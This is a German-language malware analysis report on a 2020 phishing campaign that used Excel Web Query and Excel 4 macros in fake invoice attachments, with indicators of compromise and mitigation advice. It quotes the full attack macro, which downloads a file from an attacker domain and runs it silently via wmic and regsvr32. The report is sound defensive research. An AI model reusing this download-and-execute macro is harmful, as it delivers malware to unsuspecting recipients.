Während der Missbrauch von Excel Web Query (IQY) für die Verbreitung von Malware nichts Neues ist [1], hat ein kürzlich aufgetretener Fall nicht nur die Forscher des Hornetsecurity Security Labs, sondern auch andere Security Analysten [3][6] verwundert. Bei einer E-Mail-Spam-Kampagne, bei der schädliche Excel-Dokumente in gezippten Archiven ausgeliefert werden, starten bei der Analyse auf den Computern der Security Experten schlussendlich nur die Windows Taschenrechner-Anwendung. Die Analysten gehen von einem möglichen Versuch der Angreifer aus, dadurch von der tatsächlichen Absicht des schadhaften Dokuments abzulenken, welches den Opfern zugestellt wurde. Das Security Lab geht im vorliegenden Bericht dem Fall auf den Grund.

Das Vorgehen

Die bösartigen Dokumente werden als Zip-archivierte Anhänge mit dem Namen invoice*.xls.zip verteilt, wobei der *-Teil der einzige variable Bestandteil ist. Die begleitende E-Mail-Nachricht ist sehr kurzgehalten, manchmal ohne und manchmal mit Anrede, aber immer mit einem Verweis auf den Anhang ohne weiteren Zusatztext:

Email Example Malware Scam

Sobald das Dokument entpackt und geöffnet wird, erscheint ein Popup mit einer gefälschten Dialognachricht, die besagt: „Wir haben ein Problem mit einem Inhalt gefunden. Wollen Sie versuchen, so viel wie möglich wiederherzustellen?“:

Email Example Office Excel Scam

Dann verwendet das Dokument Excel Web Query, um weiteren Makrocode von einem entfernten Standort herunterzuladen. Ein solcher beobachteter Makrocode lud eine ausführbare Datei herunter und startete sie (identifiziert als w32-dll-run-shellcode.dll), welche wiederum die Windows Taschenrechner-Anwendung calc.exe ausführte.

Das Hornetsecurity Security Lab geht davon aus, dass dies nicht die beabsichtigte Zielvorgabe war bzw. ist. Aus OSINT-Untersuchungen und der Korrelation mit anderen Quellen geht jedoch hervor, dass das einzige nachgeladene Programm w32-dll-run-shellcode.dll war. Es ist nicht bekannt, ob zu irgendeinem anderen Zeitpunkt eine bösartige nachgeladene Datei statt der w32-dll-run-shellcode.dll geliefert wurde. Es ist auch nicht bekannt, ob w32-dll-run-shellcode.dll absichtlich oder irrtümlich ausgeliefert wurde/wird.

Technische Analyse

Der Anhang

Das Dokument hat eine verborgene Tabelle:

Hidden Sheet Example

Auf dieser verborgenen Tabelle ist in den Zellen der Makrocode für das zuvor skizzierte Täuschungs-Pop-Up zu sehen:

Inside Hidden Sheet Malwarescam

Beim Ausführen des Dokuments ohne Internet wird ein Fehler mit der Angabe der schädlichen URL angezeigt, welche geladen werden sollte:

Unable to Open URL Malwarescam

Wenn das Dokument mit einem emulierten Internet ausgeführt wird und die Anfrage eine generische Antwort erhält, wird ein Web-Abfragefehler gemeldet:

Web Query Error MalwareScam

In Kenntnis dieser Tatsache können die Datenverbindungen der Mappe untersucht werden, um die Web Query Connection String offenzulegen:

Web Query Connection String MalwareScam

Leider konnte die Excel-Webabfrage-Datei (IQY) nicht geladen werden, und HTTP-Verbindungen wurden über einen 301-Code an https://www.google.com/ umgeleitet. Dies ist eine bekannte Technik, um IT-Security-Forschern den Zugriff auf den wahren Payload zu verwehren. Dies könnte auf der Grundlage von IP-Adressbereichen oder so genanntem Geofencing geschehen, so dass nur beabsichtigte Opfernetzwerke Zugriff auf das Payload haben, oder die URL könnte nur eine bestimmte Anzahl von Payload-Downloads vor der Umleitung zulassen.

Aus anderen Quellen ist bekannt, dass eine Excel Web Query-Anfrage zurückgeliefert wurde:

Source Code MalwareScam

Während die =CLOSE(FALSE)-Befehle Excel anweisen, die Tabelle zu schließen, haben wir die Basis-URL /lander/excel4_158158672/index.html weiter untersucht. Sie wurde jedoch ebenfalls auf https://www.google.com/ umgeleitet.

Schließlich gibt /lander/excel4 das folgende Excel 4-Makro zurück:

=CALL(„urlmon“,“URLDownloadToFileA“,“JJCCJJ“,0,“https://merystol.xyz/SDVsdv23r“,“c:\\Users\\Public\\fbafb4234.html“,0,0)
=IF(ALERT(„The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.“,2), WAIT(NOW()+“00:00:01″), )
=EXEC(„wmic process call create „“regsvr32 -s c:\\Users\\Public\\fbafb4234.html“““)
=CLOSE(FALSE)

Dieses Makro lädt eine Datei von https://merystol.xyz/SDVsdv23r auf c:\\\\Benutzer\\\fbafb4234.html über urlmon.URLDownloadToFileA herunter. Dann startet regsvr32 über den wmic-Prozessaufruf create, um die heruntergeladene DLL still (-s switch) zu aktivieren.

Und hier wird der Fall seltsam: Während die obige URL https://merystol.xyz/SDVsdv23r während unserer Analyse auf https://www.google.com/ umgeleitet wurde, kann man auf VirusTotal erkennen, dass die URL an einem Punkt in der Vergangenheit eine Datei mit dem Hash 85697bfc0e89c5499a46aeec656b3b9facd8b9fe7174b3db9b2b9f7dbcbaaedb lud [2].
MalwareScam VirusTotal Screenshot

Die w32-dll-run-shellcode.dll ist sehr schlicht, enthält keine Importe und kaum Zeichenketten:

$ strings 85697bfc0e89c5499a46aeec656b3b9facd8b9fe7174b3db9b2b9f7dbcbaaedb.bin !This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.reloc
RhcalcTYRQd
WinEu
w32-dll-run-shellcode.dll
_DllMain@12

Die Githubtribution über den String w32-dll-run-shellcode.dll führt zu https://github.com/CryptXor/win-exec-calc-shellcode/blob/master/build_config.py (ein Klon des ursprünglichen Projekts unter https://code.google.com/archive/p/win-exec-calc-shellcode/). Der fragliche Code ist identisch mit https://github.com/CryptXor/win-exec-calc-shellcode/blob/master/w32-exec-calc-shellcode.asm. Es handelt sich um alten PoC-Code von einem offensiven Security-Forscher, der calc.exe ausführt.

Der Download dieser w32-dll-run-shellcode.dll wurde auch von anderen Forschern beobachtet [3].

Die gleiche w32-dll-run-shellcode.dll war auch unter https://brinchik.xyz/Qz8ZNnxg verfügbar [4]. Ein Domain- und URL-Benennungsschema, das zu der hier beobachteten Malware passt. Dieselbe URL hatte Weiterleitungen zu einer URL, die Ursnif herunterlädt. Dies wurde zuvor von einem anderen Security Analysten überprüft [5]. Das bedeutet, dass es wahrscheinlich ist, dass die Ausführung von calc.exe ein berechneter Schachzug der Angreifer ist, um von der Analyse des tatsächlichen Payloads abzulenken. Ob diese Kampagne mit Ursnif in Verbindung steht und wer dahintersteckt, kann an dieser Stelle jedoch nicht bestimmt werden.

Zustellung

Die E-Mails werden von echten aol.com (89 %) und wp.pl (11 %) E-Mail-Konten verschickt. Daher bestehen die aol.com-E-Mails auch die DMARC-Validierung. Wir konnten keine Wiederverwendung von E-Mail-Adressen beobachten, d.h. die Zustellung wurde definitiv geplant, um sicherzustellen, dass für jede Sendung eine einzigartige Absender-E-Mail verwendet wurde. Die Hacker zielten jedoch auf keinen bestimmten Sektor oder Branche ab.

Die E-Mails wurden am 14.02.2020, 19.02.2020, 20.02.2020 und 21.02.2020 zugestellt:

Email Delivery History

Die Absendernamen folgen dem Muster Vorname.Nachname[0-9a-z]{0,5}@(aol.com|wp.pl).

Das geringe E-Mail-Aufkommen könnte auch darauf hindeuten, dass es sich um einen ersten Test oder eine Demonstration eines neuen bösartigen Dokumenttyps handelt, der Excel-Webabfragen nutzt.

Schlussfolgerung und Empfehlungen

Diese Kampagne verwendet Excel 4-Makros und Excel-Webabfragen zur Ausführung und Bereitstellung einer – noch unbekannten – 2nd Stage Malware. Dies ermöglicht wahrscheinlich die Umgehung einiger Abwehrmechanismen, die nur nach VBA-Makros suchen. Welcher Payload genau geliefert wird und ob die Auslieferung der 2nd Stage Malware, die einfach die Rechneranwendung öffnet, als Analyse-Umgehungstechnik oder als Fehler konzipiert ist, ist noch unbekannt. Die Zeit, die für den E-Mail-Versandt und die Umleitungen an Google über die Payload-URL aufgewendet wurde, deutet jedoch darauf hin, dass es sich um eine berechnete Ablenkung handelt.

Benutzer können sich vor dieser Art von schädlichen Dokumenten schützen, indem sie:

  • Makros und Remote-Inhalte in Office deaktivieren.
  • keine Bearbeitungs- oder Makrofunktionen aktivieren, selbst wenn dies durch ein Dokument angewiesen wird.

Hornetsecurity blockiert bereits diese Art schädlicher Kampagnen und das Security Lab beobachtet die Situation weiter.

Indicators of Compromise (IOCs)

Hashes

SHA256Description
018902c1bbfe41581710c5efad2a2c9f516bd7aa98dc8432584520623e7eb2bcDocument
6dcc25eb214c38bc942ffdbe8680a1dec867ac4780aac7262391298d561b5928Document
822054123910494bbb80cc4e46f79f045cc527dc12d89bda4b8b58bd9be417f7Document
dc778302fefac2735c112311736e2050eef7a2b84b1e1569b0456e8349d0715cDocument
e1bf01178976efeedcd277f83bebc02f8f4d687d7348d906950a0a524f3f1a98Document

DNSs

  • doolised.xyz
  • emmnebuc.xyz
  • merystol.xyz
  • veqejzkb.xyz

MITRE ATT&CK techniques

TacticIDNameDescription
Initial AccessT1193Spearphishing AttachmentSends email to obtain initial access.
ExecutionT1204User ExecutionVictim executes the payload.
ExecutionT1047Windows Management InstrumentationWMI was used to execute loading of 2nd stage payload.
Defense EvasionT1117Regsvr32Proxy execution of 2nd stage payload.